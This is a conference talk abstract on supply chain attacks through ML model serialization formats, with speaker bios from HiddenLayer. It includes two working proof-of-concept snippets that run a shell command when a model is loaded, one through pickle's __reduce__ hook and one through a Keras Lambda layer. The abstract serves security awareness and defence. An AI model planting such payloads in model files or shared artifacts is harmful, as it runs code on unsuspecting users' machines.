Malice in Chains: Supply Chain Attacks Using Machine Learning Models

This past year marked a rapid acceleration in the adoption of artificial intelligence. As AI-based solutions have started to dominate the market, a new cyber attack vector has opened up, taking CISOs by surprise: the exploitation of the underlying machine learning models. These models are often treated as black boxes that process input data and compute an output, communicating with users through an API or UI while their internals remain hidden. However, it is crucial to understand that these models are essentially code, and as such can be manipulated in unexpected and potentially malicious ways.


ML models are stored, shared, and transferred using serialization formats such as JSON, pickle, and HDF5. While some of these formats are known to be vulnerable, there is still little clarity on how attackers can subvert the models and use them to inflict real damage on victims. Unlike traditional software, ML artifacts are not routinely checked for integrity, cryptographically signed, or even scanned by anti-malware solutions, which makes them a perfect target for cyber adversaries looking to fly under the radar.
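
To illustrate why pickle in particular is dangerous (a minimal sketch, not material from the talk itself; the class name and echoed command are placeholders), the snippet below uses Python's __reduce__ hook so that merely deserializing a crafted "model" file runs an attacker-chosen command:

import os
import pickle


class PoisonedModel:
    """Stand-in for a tampered ML artifact: unpickling it executes attacker code."""

    def __reduce__(self):
        # pickle records this call and replays it during deserialization
        return (os.system, ("echo 'code executed on model load'",))


# The attacker ships this blob as if it were ordinary serialized model weights.
artifact = pickle.dumps(PoisonedModel())

# On the victim's side, simply loading the "model" triggers the command.
pickle.loads(artifact)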


In this talk, we show how an adversary can abuse machine learning models to carry out highly damaging supply chain attacks. We start by exploring several model serialization formats used by popular ML libraries, including PyTorch, Keras, TensorFlow, and scikit-learn. We show how each of these formats can be exploited to execute arbitrary code and bypass security measures, leading to the compromise of critical ML infrastructure. We present various code execution methods in Python’s pickle format, show how Keras lambda layers can be abused in HDF5, exploit the SavedModel file format via unsafe TensorFlow I/O operations, and more. Finally, we demonstrate a supply chain attack scenario in which a ransomware payload is hidden inside an ML model using steganography, then reconstructed and executed through a serialization vulnerability when the model is loaded into memory.
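
As a rough sketch of the Keras lambda-layer vector mentioned above (the file name and echoed command are placeholders, and this is an illustration rather than the speakers' actual proof of concept), an arbitrary Python function can be embedded in a saved HDF5 model and will run once the model is loaded and used on the victim's machine:

import numpy as np
import tensorflow as tf


def payload(x):
    # Arbitrary Python executes when the embedded layer is reconstructed and traced.
    import os
    os.system("echo 'lambda layer payload executed'")
    return x


# Attacker: wrap the function in a Lambda layer and ship the saved model.
model = tf.keras.Sequential([
    tf.keras.Input(shape=(1,)),
    tf.keras.layers.Lambda(payload),
])
model.save("pretrained_model.h5")

# Victim: loading and invoking the shared model runs the embedded function.
# (Recent Keras versions refuse to deserialize lambdas unless safe_mode=False is passed.)
loaded = tf.keras.models.load_model("pretrained_model.h5")
loaded.predict(np.array([[1.0]], dtype=np.float32))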

With the rise of public model repositories such as Hugging Face, businesses are increasingly adopting pre-trained models in their environments, often unaware of the associated risks. Our aim is to prove that machine learning artifacts can be exploited and manipulated in the same way as any other software, and should be treated as such: with the utmost care and caution.


Speakers

Tom Bonner

VP of Research, HiddenLayer
Tom Bonner is the Vice President of Research at HiddenLayer, responsible for a multidisciplinary team of researchers investigating novel attacks against ML/AI systems. Tom has over two decades of experience in cyber-security, previously working with Norman, HP, Cylance, and BlackBerry...

Marta Janus

Principal Researcher, HiddenLayer
Marta is a Principal Researcher at HiddenLayer, focused on investigating adversarial machine learning attacks and the overall security of AI-based solutions. Prior to HiddenLayer, Marta spent over a decade working as a researcher for leading anti-virus vendors. She has extensive experience...


Friday June 28, 2024 10:30am - 11:15am WEST